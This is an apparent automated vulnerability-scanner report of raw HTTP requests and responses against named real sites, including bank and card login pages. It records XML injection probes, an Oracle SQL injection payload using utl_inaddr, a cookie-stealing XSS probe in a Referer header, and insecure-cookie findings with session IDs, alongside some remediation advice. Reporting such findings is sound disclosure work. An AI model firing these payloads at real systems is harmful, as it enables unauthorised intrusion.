HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:44:40 GMT Server: Microsoft-IIS/6.0 Set-Cookie: RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; domain=.reachlocal.net; path=/ X-RL-Host: pweb108 X-Robots-Tag: noindex,nofollow Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d1; domain=.rtrk.com; path=/ PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Content-Type: text/html; Charset=iso-8859-1 Cache-control: private P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: country=us;expires=Sat, 05-Mar-2011 17:44:40 GMT;path=/ Set-Cookie: ASPSESSIONIDQCDCDQCR=LBBJEDMACJOOEFNDAOEPBPEH;path=/ Vary: Accept-Encoding Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 18:13:32 GMT;path=/;httponly Content-Length: 26908
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /tools]]>>/swfobject.js HTTP/1.1 Host: urlwww--feedzilla--com.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg1-px.rtrk.com/home.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:32:08 GMT Server: Microsoft-IIS/6.0 Set-Cookie: RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; domain=.reachlocal.net; path=/ X-RL-Host: pweb104 X-Robots-Tag: noindex,nofollow PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Content-Type: text/html; Charset=iso-8859-1 Cache-control: private P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: country=us;expires=Sat, 05-Mar-2011 16:32:08 GMT;path=/ Set-Cookie: ASPSESSIONIDQCDCDQCR=GFEBEDMALANMGCGFKICELPGM;path=/ Vary: Accept-Encoding Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:00:50 GMT;path=/;httponly Content-Length: 27265
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The zip parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the zip parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /?zip=75201]]>>&zcode=6292 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="NON DSP COR NID" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=UTF-8 Content-Length: 49365 Expires: Thu, 03 Feb 2011 16:34:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 16:34:33 GMT Connection: close Set-Cookie: wxbug_cookie1=lang_id=en-US&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /solo]]>>?module=facebook/login&message_num=2 HTTP/1.1 Host: www.myfinances.com Proxy-Connection: keep-alive Referer: http://www.myfinances.com/budget.php?91d41%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3d8e0c43e90=1 X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 16:26:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 16:26:51 GMT Connection: close Vary: Accept-Encoding Set-Cookie: adc=RSP; path=/; Content-Length: 6533
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /solo]]>>/form/dispatcher HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:42 GMT Content-Length: 6490 Connection: close Set-Cookie: adc=RSP; path=/;
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /solo/form]]>>/dispatcher HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:53 GMT Content-Length: 6490 Connection: close Set-Cookie: adc=RSP; path=/;
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /solo/form/dispatcher]]>> HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:20 GMT Content-Length: 6490 Connection: close Set-Cookie: adc=RSP; path=/;
The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.
You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.
Issue remediation
The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.
Request
GET /1/nat?id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1 Accept: */* Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: app.insightgrit.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 18:59:42 GMT Server: Apache Location: https://app.insightgrit.com/Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527 Content-Length: 614 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://app.insightgrit.com/Visit37.php?vt=V&am ...[SNIP]...
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: 220marketing9-px.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527 HTTP/1.1 Accept: */* Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: app.insightgrit.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:59:37 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 03 Feb 2011 18:59:37 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: PHPSESSID=f7173c41fd6dd0db660d473234eef682; path=/ Set-Cookie: IG94375=f7173c41fd6dd0db660d473234eef682; expires=Mon, 04-Apr-2011 18:59:37 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 49 Connection: close Content-Type: image/gif
The following cookie was issued by the application and does not have the secure flag set:
sessionId=nullCookie; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cib/CEBMainServlet/Login?FIORG=330&FIFID=124085066 HTTP/1.1 Host: cibng.ibanking-services.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 13:44:22 GMT Server: IBM_HTTP_Server Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-Cache Set-Cookie: wf=wf Set-Cookie: sessionId=nullCookie; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 9003
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>Personal Savings from American Express : Welcome to Personal Savings from American ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: icapture.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mwssignup/ HTTP/1.1 Host: mappoint-css.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:06:17 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=ygweoz45fmxyoqio3eycxw55; path=/; HttpOnly Cache-Control: private Expires: Thu, 03 Feb 2011 19:06:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 6559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /upmb/disp HTTP/1.1 Host: mymortgage.regionsmortgage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/fuidfyp/us/action?request_type=un_fuid&Face=en_US&entry_point=lnk_fuid&ReqSource=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_acct_summary HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d0f645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; SaneID=173.193.214.243-1296742163652146; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1ab45525d5f4f58455e445a4a42be89;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/logon/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_acct_summary HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d0f645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; SaneID=173.193.214.243-1296742163652146; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1ab45525d5f4f58455e445a4a42be89;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: onlineimagelockbox.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RegSysProfileCenter/default.aspx?lcid=1033 HTTP/1.1 Host: profile.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm HTTP/1.1 Host: rewards.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en"> <head> <title> American Express - Mem ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comment20AMX.asp?time1= HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCQBRBBCR=MFJLFHCBMHKCEOMCNICCPKPP; path=/ Date: Thu, 03 Feb 2011 13:47:40 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /epayments/default.asp HTTP/1.1 Host: secure.thepaymentwindow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Thu, 03 Feb 2011 15:51:15 GMT X-Powered-By: ASP.NET Connection: close Content-Length: 297 Content-Type: text/html Set-Cookie: mySession=c3d8cbcb%2D179f%2D45ab%2D8d5e%2D6201d0b9c5e5; path=/epayments Cache-control: private Server: Unknown Web Server Set-Cookie: TLTSID=957CA41D4A7F550937527C8B9C274358; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ForgottenPassword.aspx HTTP/1.1 Host: securebank.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: securebank.regions.com-https=R851515607; path=/ Connection: close Date: Thu, 03 Feb 2011 15:51:16 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0)) X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=v44xql55xf30pojhjmjotu55; path=/ Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 15697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <HTML> <HEAD> <title>Regions Online Banking</title> <link href="styles/styles. ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login.aspx HTTP/1.1 Host: securebank.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: securebank.regions.com-https=R929786393; path=/ Connection: close Date: Thu, 03 Feb 2011 15:51:17 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0)) X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=zcov5huv0navdtav2ahkib55; path=/ Set-Cookie: vwsli=true; path=/ Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 12024
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <HTML> <HEAD> <title>Regions Online Banking</title> <link href="styles/styles. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /main/spectrum/Home HTTP/1.1 Host: www.consumercardaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
